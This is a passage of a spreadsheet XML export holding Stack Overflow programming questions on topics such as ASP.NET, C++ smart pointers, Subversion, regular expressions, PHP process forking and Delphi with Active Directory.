&lt;p&gt;&lt;strong&gt;Author's Note&lt;/strong&gt;: I hadn't looked at this question in ages, there was a recent response, so I moved my 'answer' into the question and deleted the 'answer' (since it wasn't really an answer).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Explicitly Post To Server From Checkbox Control OnCheckChanged Event</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an asp:checkbox control, and I want to change the visibility of a Label when it is checked or unchecked. To do this I'm attempting to use the OnCheckChanged event, which apparently only fires after a post to the server. This means that my Label's visibility isn't changing immediately. How do I post to the server (and preserve the state of my form) so that when the checkbox is clicked the Label's visibility immediately toggles? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using boost::shared_ptr in a library's public interface</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a C++ library that we provide to several different clients. Recently we made the switch from using raw pointers in the public interface to using boost::sharedptr instead. This has provided an enormous benefit, as you might guess, in that now the clients no longer have to worry about who needs to delete what and when. When we made the switch I believed it was the right thing to do, but it bothered me that we had to include something from a third-party library in our public interface - generally you avoid that kind of thing if you can. I rationalized it that boost was practically part of the C++ language now, and our use case requires that both the client code and the library hold pointers to the objects.  However recently one of our clients has asked us if we could switch to using a neutral smart pointer class in the interface, because our library is essentially forcing them to a particular version of boost- a point which I certainly understand and appreciate. So now I am wondering what the best course of action might be. I have thought about it a little bit, and wondered about creating a simple smart pointer class that simply held a real boost smart pointer. But then the clients would probably immediately stuff one of those into their flavor of boost::sharedptr, and then we'd be three shared pointers deep - which might be a problem, or it might not. Anyway, I'd love to hear some opinions from the community about the best way to solve this problem.&lt;/p&gt;
&lt;p&gt;Edit: I originally said transfer of ownership, but I should have specified that code on both sides of the API boundary need to hold a pointer to the object.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a debug working set (Eclipse)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Eclipse IDE and notice an option in the Debug perspective in the Breakpoints view that allows me to chose/create a working set. I've found all kinds of help online that tells me how to make a working set or choose a working set, but nothing that explains what a working set is or why I'd want to use one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET sites, hiring external design firms and standards</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey. We're building a large ASP.NET website, and have hired an external firm to do the design (CSS + protoype pages). In fitting the design to the page, we've found a number of problems that indicate ASP.NET's workings were never considered. My question is - Is there a common standard (that should be) used by design firms creating what will become an ASP.NET site?&lt;/p&gt;
&lt;p&gt;We've found things like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Using IDs on HTML elements for
CSS/JS to find, which doesn't work
with server tags generating IDs.&lt;/li&gt;
&lt;li&gt;IDs with hyphens in them&lt;/li&gt;
&lt;li&gt;ValidatorSummary example built in a completely different style to ASP.NET's.&lt;/li&gt;
&lt;li&gt;Assumptions that all buttons will be &amp;lt;input&amp;gt; tags&lt;/li&gt;
&lt;li&gt;Margin styles on &amp;lt;div&amp;gt;s, interfering with our use of panels &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The first instance is a problem. The rest are inconvient misunderstandings. As usual, there are intense time constraints, so in this sea of &lt;em&gt;'we'll fix it / get our designer to look at it / work around it'&lt;/em&gt;, I'm largely hoping there's some fundamental building block that would have stopped most of these problems from happening.&lt;/p&gt;
&lt;p&gt;The design firm is large, with a substantial body of large-site work behind them, so sadly the 'don't hire a one man shop' wisdom isn't the ticket in this case...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[Update]&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;If you're in the position of hiring an external web design firm, and have the luxury of early collaboration and wish to help bridge the gap of meeting ASP.NET's requirements, here's our current list of guidelines. Please comment below if you feel there's something that should be added:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Please encapsulate each the page in a &amp;lt;form&amp;gt; tag (ie.
place it directly after the
&amp;lt;body&amp;gt; tag), and use no other &lt;code&gt;&amp;lt;form&amp;gt;&lt;/code&gt; tags on the page&lt;/li&gt;
&lt;li&gt;&lt;p&gt;To
display a summary of page validation
errors, please cater to rendering
the following format example: &lt;/p&gt;
&lt;p&gt;&lt;code&gt;&amp;lt;div class="error_class"&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;lt;h3&amp;gt;&lt;/code&gt;Please review the following fields&lt;code&gt;&amp;lt;/h3&amp;gt;&lt;/code&gt;&lt;br /&gt;
   &lt;code&gt;&amp;lt;ul&amp;gt;&lt;/code&gt;&lt;br /&gt;
      &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt;Home phone number&lt;code&gt;&amp;lt;/li&amp;gt;&lt;/code&gt;&lt;br /&gt;
      &lt;code&gt;&amp;lt;li&amp;gt;&lt;/code&gt;Surname&lt;code&gt;&amp;lt;/li&amp;gt;&lt;/code&gt;&lt;br /&gt;
    &lt;code&gt;&amp;lt;/ul&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;lt;/div&amp;gt;&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;Please avoid driving styles off the ID or name property.&lt;/li&gt;
&lt;li&gt;If there are HTML components that need to be turned on and off, these components should be encapsulated in a &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; element, so that the div's visibility can be set to 'false'.&lt;/li&gt;
&lt;li&gt;If styling buttons, please cater to both &lt;code&gt;&amp;lt;input&amp;gt;&lt;/code&gt; tags and &lt;code&gt;&amp;lt;a ... class="example_class"&amp;gt;&lt;/code&gt; &lt;code&gt;&amp;lt;span&amp;gt;&lt;/code&gt;Button text&lt;code&gt;&amp;lt;/span&amp;gt;&lt;/code&gt;` formats.&lt;/li&gt;
&lt;li&gt;Avoid setting attributes on class-less &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;span&amp;gt;&lt;/code&gt; tags.&lt;/li&gt;
&lt;li&gt;Thank you for bearing with us.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>A question about datasource objects in ASP.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When using DataSources in ASP.net applications, paging and sorting along with GridView only works out of the box when using DataSet, DataTable, DataViews if you are using anything else you need to implement methods that perform paging as well as partial data retrieval from the datasource. I dont know many design nowadays that pass around DataSets accross layers. I am a big POCO fan and I like to keep things simple specially when working with DataContracts in WCF.&lt;/p&gt;
&lt;p&gt;Am I missing something or is it too much to expect paging and sorting working out of the box or is it guys at MS dont think its important??? Is the DataPager control the answer??&lt;/p&gt;
&lt;p&gt;Also,I would really appreciate if someone can give me a fully functional [gridview- object data source - Paging &amp;amp; sorting] tutorial/link. The ones I saw online made me feel that you need to hack your way in order to make it work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making Applications programmed in .NET languages work on older machines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Wondering if anyone knows how to see what parts of the .NET framework need to be installed to get cerftain functions working on older machines.  Is there a way I can install them with my application without installing the entire .NET framework?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is .NET MVC must learn technology?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it here to stay, or is this something just pushed out quickly as a "me too" offering, in response to the Rails community?&lt;/p&gt;
&lt;p&gt;Is it necessary to go through the learning curve, and will the Framework move to only working this way, without the Page behind model?&lt;/p&gt;
&lt;p&gt;If so where's the best place to pick up MVC essentials for .NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you detect that monkey patching has occurred in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you check that monkey patching has been done to a specific class in Ruby?  If that is possible, is it also possible to get the previous implementation(s) of the attribute that's been patched?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What techniques are available for memory optimizing in 8051 assembly language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to optimize code to get room for some new code. I do not have the space for all the changes. I can not use code bank switching (80c31 with 64k). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Collision Detection between two images in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two characters displayed in a game I am writing, the player and the enemy. defined as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void player(Graphics g) {
    g.drawImage(plimg, x, y, this);
}
public void enemy(Graphics g) {
    g.drawImage(enemy, 200, 200, this);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then called with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;player(g);
enemy(g);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am able to move player() around with the keyboard, but I am at a loss when trying to detect a collision between the two. A lot of people have said to use Rectangles, but being a beginner I cannot see how I would link this into my existing code. Can anyone offer some advice for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Non-axis aligned scaling</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Finding a good way to do this has stumped me for a while now: assume I have a selection box with a set of points in it. By dragging the corners you can scale the (distance between) points in the box. Now for an axis aligned box this is easy. Take a corner as an anchor point (subtract this corner from each point, scale it, then add it to the point again) and multiply each points x and y by the factor with which the box has gotten bigger.&lt;/p&gt;
&lt;p&gt;But now take a box that is not aligned with the x and y axis. How do you scale the points inside this box when you drag its corners?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create a Search Engine with SQL 2000 and ASP.NET C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to create a search engine that will be based on 5 columns in a SQL 2000 DB.  I have looked into Lucene.NET and read the documentation on it, but wondering if anyone has any previous experience with this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the uses of svn copy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Example:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ svn copy foo.txt bar.txt  
A    bar.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;When would you use this technique, and why? &lt;/li&gt;
&lt;li&gt;Will this command (taken from svn's "red book") creates a copy of &lt;code&gt;&amp;lt;foo.txt&amp;gt;&lt;/code&gt; while preserving the history of it to be shared with &lt;code&gt;&amp;lt;bar.txt&amp;gt;&lt;/code&gt;?  &lt;/li&gt;
&lt;li&gt;If I'm changing &lt;code&gt;&amp;lt;bar.txt&amp;gt;&lt;/code&gt;, what will happen to &lt;code&gt;&amp;lt;foo.txt&amp;gt;&lt;/code&gt;?    &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What are the equivalents to this in other modern systems (Clearcase, Accurev, Perforce)?  &lt;/p&gt;
&lt;p&gt;Let me emphasize the point I'm searching for:&lt;br&gt;
Is this kind of branching out on a file level?&lt;br&gt;
What happens if you use it in the same branch, i.e. create a copy of a file and than start changing that new file. all in the same branch?&lt;br&gt;
I understand that it is also used for tagging but what is interesting me is what to expect when performing &lt;code&gt;&amp;lt;svn copy&amp;gt;&lt;/code&gt; on the file level.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the relative difference between in-proc, interprocess, and inter machine calls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ignoring payload size, what is relative difference in latency between an in-proc call (say in C++ or Java), a socket call to a process on the same machine, and a socket call to a process on another machine? This can be expressed as a minimum latency in ns/ms or in terms of relative orders of magnitude. &lt;/p&gt;
&lt;p&gt;I'm looking for something similar to this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://duartes.org/gustavo/blog/post/what-your-computer-does-while-you-wait" rel="nofollow"&gt;http://duartes.org/gustavo/blog/post/what-your-computer-does-while-you-wait&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;... but extended to in-proc vs. network calls (assume fast intranet).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Discarding the output of a function that needs an output iterator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose thereÂ´s a template function in C++ that does some useful work but also outputs a sequence of values via an output iterator. Now suppose that that sequence of values sometimes is interesting, but at others is not useful. Is there a ready-to-use iterator class in the STL that can be instantiated and passed to the function and will ignore any values the function tries to assign to the output iterator? To put in another way, send all data to /dev/null?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regex expression to split string into items</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got text in a form of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[1/12/2008 2:32:11 p.m. - name]
line 1
[1/12/2008 2:36:00 p.m. - name] - PRIVATE
line 2 [some text] sd
[1/12/2008 2:36:00 p.m. - name]
line 3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which i want to split into items so i have access to time, name and text of each item, &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;e.g.:
(item 1)
  1: 1/12/2008 2:32:11 p.m.
  2: name
  3: line 1
(item 2)
  1: 1/12/2008 2:36:00 p.m.
  2: name
  3:  - PRIVATE
    line 2 [some text] sd
(item 3)
  1: 1/12/2008 2:36:00 p.m.
  2: name
  3: line 3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was trying to come up with a single regex pattern to achieve this, but no luck:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\[([0-9\/ \:\.apm]+?) - ([a-z_\-0-9]+?)\](.*?\r\n.+?)(?:\[[0-9\/ \:\.apm]+? - [a-z_\-0-9]+?\])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This pattern above only returns the first item.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\[([0-9\/ \:\.apm]+?) - ([a-z_\-0-9]+?)\](.*?\r\n.+?)(?!\[[0-9\/ \:\.apm]+? - [a-z_\-0-9]+?\])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The pattern above returns all items, but only first character of the text (group 3)&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What causes svn commit to fail and report a file/dir as obstructed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am pretty much the only person making check ins to the svn repo but for some reason over the past week Tortoise is reported that my WCF Service Reference directory is 'obstructed' and I cant commit my changes. If I have no even made any changes to the contents of that directory, why does svn report obstructed and what does that even mean?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular Expression for alphanumeric and underscores</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to have a regular expression that checks if a string contains only upper and lowercase letters, numbers, and underscores.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to redirect to (or enforce) SSL connection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Zend Framework(MVC part of it), and need to either redirect user to SSL enabled page or to force SSL from controller somehow and don't quite see how to do that? Maybe someone can share the knowledge? &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I enforce a maximum amount of forked children?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;EDIT: I've tagged this C in a hope to get more response.  It's more the theory I'm interested in than a specific language implementation.  So if you're a C coder please treat the following PHP as pseudo-code and feel free to respond with an answer written in C.&lt;/p&gt;
&lt;p&gt;I am trying to speed up a PHP CLI script by having it execute its tasks in parallel instead of serial.  The tasks are completely independent of each other so it doesn't matter which order they start/finish in.&lt;/p&gt;
&lt;p&gt;Here's the original script (note all these examples are stripped-back for clarity):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
$items = range(0, 100);
function do_stuff_with($item) { echo "$item\n"; }
foreach ($items as $item) {
    do_stuff_with($item);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've managed to make it work on the &lt;code&gt;$items&lt;/code&gt; in parallel with &lt;a href="http://php.net/pcntl_fork" rel="nofollow"&gt;&lt;code&gt;pcntl_fork()&lt;/code&gt;&lt;/a&gt; as shown below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
ini_set('max_execution_time', 0); 
ini_set('max_input_time', 0); 
set_time_limit(0);
$items = range(0, 100);
function do_stuff_with($item) { echo "$item\n"; }
$pids = array();
foreach ($items as $item) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        die("couldn't fork()");
    } elseif ($pid &amp;gt; 0) {
        // parent
        $pids[] = $pid;
    } else {
        // child
        do_stuff_with($item);
        exit(0);
    }   
}
foreach ($pids as $pid) {
    pcntl_waitpid($pid, $status);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I want to extend this so there's a maximum of, say, 10 children active at once.  What's the best way of handling this?  I've tried a few things but haven't had much luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I need help...........sample project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anybody give me one sample Asp.Net Project where all the Object oriented concept like class, abstraction, polymorphism, Inheritance and array list has been used for my practice purpose.&lt;/p&gt;
&lt;p&gt;I am new to this platform i know all the above mentioned concept but i don't know where and how to use those concept in web application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Prerequisites Needed to Read Books on Neural Networks (and understand them)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to learn about Neural Networks for a while now, and I can understand some basic tutorials online, and I've been able to get through  portions of &lt;a href="http://rads.stackoverflow.com/amzn/click/0852742622"&gt;Neural Computing - An Introduction&lt;/a&gt; but even there, I'm glazing over a lot of the math, and it becomes completely over my head after the first few chapters. Even then its the least book "math-y" I can find.  &lt;/p&gt;
&lt;p&gt;Its not that I'm afraid of the math or anything, its just I haven't learned what I need, and I'm not sure what I need exactly.  I'm currently enrolled at my local university, working on catching up on classes I need to enter the MS in Comp. Sci program (my BA is in Business/Info. Sys.) and  I haven't gotten very far.  According to the university's little course descriptions, NN's are actually covered in a Electrical Engineering course on Pattern Recognition (seems odd to me that this course is EE), which has a few EE prereq's that I don't need to get into the MS Comp. Sci. Program.&lt;/p&gt;
&lt;p&gt;I'm extremely interested in this topic, and know I eventually want to learn a lot more about it, the problem is, I don't know what I need to know first.  Here are topics I think I might need, but this is just speculation from ignorance:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Single Variable Calculus (I've had Calc I and II, so I think I'm covered here, just listing for completeness)&lt;/li&gt;
&lt;li&gt;Multi Variable Calculus&lt;/li&gt;
&lt;li&gt;Linear Algebra (I've not taken this formally yet, but can actually understand many of the concepts from what I've managed to grok on Wikipedia and other sites)&lt;/li&gt;
&lt;li&gt;Discrete Mathematics (Another I've not taken formally, but learned a portion of on my own&lt;/li&gt;
&lt;li&gt;Graph Theory&lt;/li&gt;
&lt;li&gt;Probability Theory&lt;/li&gt;
&lt;li&gt;Bayesian Statistics&lt;/li&gt;
&lt;li&gt;Circuit Design&lt;/li&gt;
&lt;li&gt;Other maths?&lt;/li&gt;
&lt;li&gt;Other comp sci topics &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Obviously there is a neuroscience component here as well, but I actually haven't had any trouble understanding books when they talk about it as applied to NN's, largely because its conceptual&lt;/p&gt;
&lt;p&gt;In short, Can someone lay out a semi-clear path that one needs to really understand, read book on and eventually implement Neural Networks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Somebody explain me Html.DropDown and it's dearest friend SelectList</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you check my earlier questions you may have noticed I just don't get the SelectList and Html.DropDown(). I find it intrigueing that I seem to be the only one in this. So maybe I should try to change my mindset or maybe there are things I don't know that will clear this all up. I really love the whole MVC framework, but SelectList just doesn't want to fit in my head. So here's my list:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SelectList&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Why can't I set the selected value after instantiation&lt;/li&gt;
&lt;li&gt;Why can't I set selectedValue by index of items&lt;/li&gt;
&lt;li&gt;Why is the selectedvalue sometimes a string, sometimes the class I put into it and sometimes a ListItem&lt;/li&gt;
&lt;li&gt;Why are the items only accesible through GetItems()&lt;/li&gt;
&lt;li&gt;Why don't the types of selectedItem and the listItems match?&lt;/li&gt;
&lt;li&gt;Why are the items you put in the list converted to listItem and the selectedItem not?&lt;/li&gt;
&lt;li&gt;Why can't I get the count of the items without usint the GetItems() method&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Html.DropDownList()&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Why doesn't modelbinding work with it&lt;/li&gt;
&lt;li&gt;Why is there no behaviour for defaulting selection when there's only one option &lt;/li&gt;
&lt;li&gt;Why doesn't making an item SelectedValue in the source selectLIst make it the marked item&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Before ppl suggest me to write my own:&lt;br /&gt;
Since this will be shipped with the MVC product, I would rather have the offical support for a basic controll then to roll my own and have all the troubles that come with it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Explicit script end tag always converted to self-closing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using xslt to transform xml to an aspx file. In the xslt, I have a script tag to include a jquery.js file. To get it to work with IE, the script tag must have an explicit closing tag. For some reason, this doesn't work with xslt below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;xsl:stylesheet version="1.0"
    xmlns="http://www.w3.org/1999/xhtml"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl"
    xmlns:asp="remove"&amp;gt;    
    &amp;lt;xsl:output method="html"/&amp;gt;
    &amp;lt;xsl:template match="/"&amp;gt;
        &amp;lt;html xmlns="http://www.w3.org/1999/xhtml"&amp;gt;
            &amp;lt;head&amp;gt;
                &amp;lt;title&amp;gt;TEST&amp;lt;/title&amp;gt;
                &amp;lt;script type="text/javascript" src="jquery-1.2.6.js"&amp;gt;&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if I change the script tag as shown below, it works. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        &amp;lt;script type="text/javascript" src="jquery-1.2.6.js"&amp;gt;
            // &amp;lt;![CDATA[ // ]]&amp;gt;
        &amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought that the &lt;code&gt;&amp;lt;xsl:output method="html" /&amp;gt;&lt;/code&gt; would do the trick, but it doesn't seem to work?&lt;/p&gt;
&lt;p&gt;/Jonas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enable ListView multiselect by dragging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I enable multi-select in a WPF ListView by dragging? &lt;/p&gt;
&lt;p&gt;Setting the SelectionMode property to Extended does allow multi-select using Shift and Ctrl, but not by clicking and dragging. Setting the SelectionMode property to Multiple gives a sticky selection which isn't what I want.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Custom client-side validator for "one of two fields must be filled"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you tell me if there anybody has implemented a &lt;strong&gt;custom validator for checking that one of two (or N)&lt;/strong&gt; input fields are filled?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   "Insert phone number or email address"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using ASP.NET (Ajax) 3.5, the ajaxToolkit:ValidatorCalloutExtender (and jQuery if it's necessary).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Chaining containers with StructureMap</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to link containers together in StructureMap like it is in WindsorContainer.AddChildContainer()?&lt;/p&gt;
&lt;p&gt;I want to achieve having 3 container levels;
- 1 page request level
- 1 session level
- 1 application level&lt;/p&gt;
&lt;p&gt;These would then be chained together so only one instance request would be made to the "base level" container.&lt;/p&gt;
&lt;p&gt;The levels of container are unimportant really, just whether there is the ability to link them together.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you apply patches on a web project at production server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We recently had a project where we released beta of a big web app on our client's server. Our client requested us to do bug fixes as they come, and we tried to do it same way. Normally while building an app on our prototype server is way easier, as I just have to issue simple 'svn up' command which takes a second. &lt;/p&gt;
&lt;p&gt;But on production environment, we do not have any version control tool available. Is it possible to automate the patching work, so that we need not to login to ftp and upload each a every file one by one? &lt;/p&gt;
&lt;p&gt;Its very difficult to work this way. As I'm having this problem, its for sure that some of you have already solved the problem. Please share your solutions.&lt;/p&gt;
&lt;p&gt;Looking forward to your replies... Thanks a lot for reading guys.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>core dump at _dl_sysinfo_int80 ()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a TCP client that connects to a listening server.
We implemeted TCP keep alive also.
Some times the client crashes and core dumped.
Below are the core dump traces.&lt;/p&gt;
&lt;p&gt;Problem is in linux kernel version Update 4, kernel 2.6.9-42.0.10.&lt;/p&gt;
&lt;p&gt;we had two core dumps.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(gdb) where
#0 0x005e77a2 in _dl_sysinfo_int80 () from /ddisk/d303/dumps/mhx239131/ld-
linux.so.2
#1 0x006c8bd1 in connect () from /ddisk/d303/dumps/mhx239131/libc.so.6
#2 0x08057863 in connect_to_host ()
#3 0x08052f38 in open_ldap_connection ()
#4 0x0805690a in new_connection ()
#5 0x08052cc9 in ldap_open ()
#6 0x080522cf in checkHosts ()
#7 0x08049b36 in pollLDEs ()
#8 0x0804d1cd in doOnChange ()
#9 0x0804a642 in main ()
(gdb) where
#0 0x005e77a2 in _dl_sysinfo_int80 () from /ddisk/d303/dumps/mhx239131/ld-
linux.so.2
#1 0x0068ab60 in __nanosleep_nocancel ( 
from /ddisk/d303/dumps/mhx239131/libc.so.6
#2 0x080520a2 in Sleep ()
#3 0x08049ac1 in pollLDEs ()
#4 0x0804d1cd in doOnChange ()
#5 0x0804a642 in main ()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We have tried to reproduce the problem in our environment, but we could not.&lt;/p&gt;
&lt;p&gt;What would cause the core file?&lt;/p&gt;
&lt;p&gt;Please help me to avoid such situation.&lt;/p&gt;
&lt;p&gt;Thanks,
Naga&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to write your own .net obfuscator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am very curious as to how people write their own obfuscator.&lt;/p&gt;
&lt;p&gt;How hard would it be to simply do the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;rename all public methods with GUID type names.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Where would I start?  How would I go about reading the .net dll assemby, pulling the public methods out and renaming them?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is Visual Studio's table adapter query not returning the same data as the stored procedure it represents?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a table adapter in Visual Studio to make a query to a stored procedure in my SQL Server 2005 database.  When I make the call via my website application it returns nothing.  When I make the same call via SQL Server Manager it returns the expected data.&lt;/p&gt;
&lt;p&gt;I put a breakpoint on the call to the adapter's &lt;code&gt;getData&lt;/code&gt; method and looked at all the parameters and their values and matched them in a query from server management to make sure.  I'm sending the following query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;getData(string, date, date, int, int?, int?, string, int?, string)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;further&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;getData('0000-rtg', '1/1/2007', '3/12/2008', 0, null, null, null, null, null)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I guess I'm wondering if Visual Studio does something with the &lt;code&gt;null&lt;/code&gt;'s before it tries to send the query to the SQL server.  If not, how do I fix this problem?&lt;/p&gt;
&lt;p&gt;EDIT:
All these values are passed by variables, I just typed what was in those variables at that break point.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do integrate Delphi with Active Directory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We need to validate an user on Microsoft's Active Directory using Delphi 7, what is the best way to do that?&lt;/p&gt;
&lt;p&gt;We can have two scenarios: the user inputs its network username and password, where the username may include the domain, and we check on active directory if it is a valid, active user. Or we get the current logged user from Windows, and check on AD if it is still valid.&lt;/p&gt;
&lt;p&gt;The first scenario requires user validation, while the second one just a simple AD search and locate.&lt;/p&gt;
&lt;p&gt;Does anyone know of components or code that do one or both of the scenarios described above?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript Marquee to replace &lt;marquee&gt; tags</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm hopeless at Javascript. This is what I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script type="text/javascript"&amp;gt;
    function beginrefresh(){
        //set the id of the target object
        var marquee = document.getElementById("marquee_text");
        if(marquee.scrollLeft &amp;gt;= marquee.scrollWidth - parseInt(marquee.style.width)) {
            marquee.scrollLeft = 0;
        }
        marquee.scrollLeft += 1;
        // set the delay (ms), bigger delay, slower movement
        setTimeout("beginrefresh()", 10);
    }
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It scrolls to the left but I need it to repeat relatively seamlessly. At the moment it just jumps back to the beginning. It might not be possible the way I've done it, if not, anyone have a better method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worth it to code different functionality for users with javascript disabled?</t>
  </si>
  <si>
